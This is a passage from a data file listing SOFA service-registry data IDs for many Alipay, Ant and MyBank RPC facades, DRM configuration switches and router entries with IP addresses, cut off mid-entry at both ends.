y.opensupport.common.service.integration.dwbillcenter.DwBillCenterClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.clientpg.MobilePgTemplateConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.guabus.common.service.facade.api.gua.GuaInduAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smcp.facade.securityexplore.AeTaskTagFacede:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.mydds.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:bkcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue50:onelevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finsign.common.service.facade.finauth.service.InsuranceAuthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.producttemplate.MatchableProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.211.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.core.service.DailyCutService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.MrpcSuggestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imdop.common.service.facade.LeadsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.selectcore.common.service.facade.api.TroubleShootingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.obHisSwitchConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dwdssp_smartbiz_process_finish_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.merchantinfo.MrchantBaseInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.mobilegeocoding.common.service.client.drm.BizClientDrmServiceImpl.serviceMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdabombardier.common.service.facade.realright.IotRealRightQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.OverseaRemitAuditCallBackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:salesmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipayment.service.facade.v2.chargeback.CBJudgeServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.account.signaccount.service.BizUniqueMapQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:PromoPlatform_malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.capacity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.comment.MskCommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-ifxposition-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.scenecube.facade.SceneStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:insproductplatform_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaxconnectplatform.common.service.yunfengdie.product.TemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:fuelprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfmreceipt.service.facade.api.AllocateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsCrowdManager.frameProfileCodeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceItemDisplayCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.46.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.baitiaoprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.decisionx.facade.DecisionService:1.0:codedds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchstm.common.service.facade.product.facade.AssetProductIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.LogControlDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.common.service.facade.paybox.platform.PayBoxFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finpwm.finpwmXTradeSlaveDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.cif.client.drm.TairToTbaseSwitch.switchToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dtbank.facade.api.ActivityManageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.89.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dss.endpoint.plugin.openapi.HostMonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.HbaseCheckDataDrm.hbaseCheckUserList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.rule.core.publish.drm.RulePublishResource.enableHuffman,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.loadTestStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanbenefit.common.service.facade.whitelist.CrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.sentence.facade.SentenceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.gotong.GotoneQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:unifygw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:aggrbillinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:antsecurity_securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.confregUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininflux.common.service.facade.info.InfoService:1.0:instfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custgrowth.common.service.facade.CrowdSyncService:1.0:syncPayDataCenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.da.common.service.facade.api.MerchantMccStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:acrmng-creditCommissionOneStepCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.InsAutoAfterMarketApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaec.common.service.facade.facade.ActionEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:bizfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_repository_supportKnowledgeEvaluationGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:loadtest_app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.97.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.netflowcore.api.RuleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilerelation.common.service.facade.TagGroupInfoCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.service.SecOpsClientChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.payacceptance.common.service.api.PeerPayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.alsc.kbtservindustry.facade.portfolio.PortfolioQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlaw.common.service.facade.api.SealService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_11#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.test.SimpleService-33#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ecoqltprod.biz.eco.service.EcoHybridTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.report.common.service.facade.api.outline.OutlineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AcsAccountDRM.webFilePayeeCardNoBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.infosec.content.service.facade.RiskContentHBaseComponent:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.instrument:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.bizservice.facade.SecurityInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_APPSTORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.quickpoint.api.QuickPointBeanConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.biz.service.support.template.WdspServiceTemplate:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.OpenOperatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acorchestraweb.web.home.sofarest.ServiceFlowNodesRestRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_O_SALESMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilechat.common.service.facade.api.AutoReplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.shop.ShopInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.system.SystemInfoQueryFacade:1.0:systemInfoQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxInteractiveTaskExecuter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.TransferprodQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.campaign.CampaignTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:zpaascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.24.99.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:crossborderaudit_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.120.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:applyContractProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.SidePanelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pointmng_mpointAdjust_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:scardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fundboss.api.QueryInstItemForIfundBossService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.68.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_pointAccountCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.product.ProductConfigWith6RelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.drm7013#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.core.service.AccountPreBalanceTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofagateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainconfigcenter.facade.productitem.agreement.api.AgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.enterprise.api.EPSecurityprodManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.trade.UnifiedTradeMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.FeatureInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.39.60.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfocore.common.service.facade.fop.api.mng.MsgSenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insuserview.biz.shared.gray.CommonGrayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatMessageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.ProductRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finadvisorprod_processCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.132.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_O_AQC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbcontentprod.common.service.facade.api.content.ContentProdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.AuthFieldAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.BankcardAccountChangeMsgProcessDrm.needProcess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bkpromoguard.facade.ops.api.OpMetadataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antdatashow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbmarketcenter.common.service.facade.manager.service.MarketActivityRuleManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.users,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smartsql.service.facade.service.ResourceService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.69.213.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.distributionagent.DistributionAgentPhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.datacontext.common.service.facade.bizcontext.api.FcBizContextService:1.0:fcbizcontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.exercise.ExerciseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finboss.common.service.facade.instcontract.InstContractDigestQueryProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.recycleBudgetPidsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.76.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.contactmanage.api.FinancingNotifyTypeManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductNoRuleQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aims@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.DynamicIconDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_ASSETXP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.queryCapitalOrdersByOffset,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:sesameCredit_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.core.AfscApprovalConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.kybmeta.facade.api.InstanceRuntimeService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mrchasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.164.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbshopdetail.facade.CateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.buffettConfig.BuffettShopDedupJudgeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.rollMaxLoadNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.college.location.ResLocationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.porder.common.service.api.usageCard.UsageCardAgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.portal.common.service.facade.qualityassess.TagQualityAssessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbmarketcenter.common.service.facade.activity.service.ActivityUserRightQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundselling:name=com.alipay.financeprod.biz.shared.drm.impl.MessageSwitchConfigDrmImpl.metaQClosedConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sportsprod.common.service.client.SportsprodQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.himalayas.services.crm.facade.email.MailTemplateQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.csplatform.service.BenefitExchangeOrderCSPlatformQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.admin.template.LifeMsgTemplateAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.FreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fppolicymng_ProcessCallbackNew@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchopenai.ai.common.service.facade.api.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.student.facade.StudentQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:pcreditcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.fund.FundManagerServiceFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zskynet.facade.alarmcheck.DecisionTreeAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobiledc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.EbppSaleProductManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.common.ipromo.mobilerpc.facade.service.AppleJuiceSignAndTradeInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.overseaprod.common.service.inremit.rpc.InremitCustomerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.sac.StarAgentExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:zmmccmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wkprod.common.service.facade.rate.WkSpotRateConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.system.FavorServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iliquidity.service.facade.api.transfer.BankTransferCycleFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.consumeAmountLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.atd:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antdld@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.clearingcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.acsellcore.common.service.facade.OssFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.toBeEffectiveProductsCanSurrender,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.19.29.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassistantcore.mng.facade.entity.api.EntityUploadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bk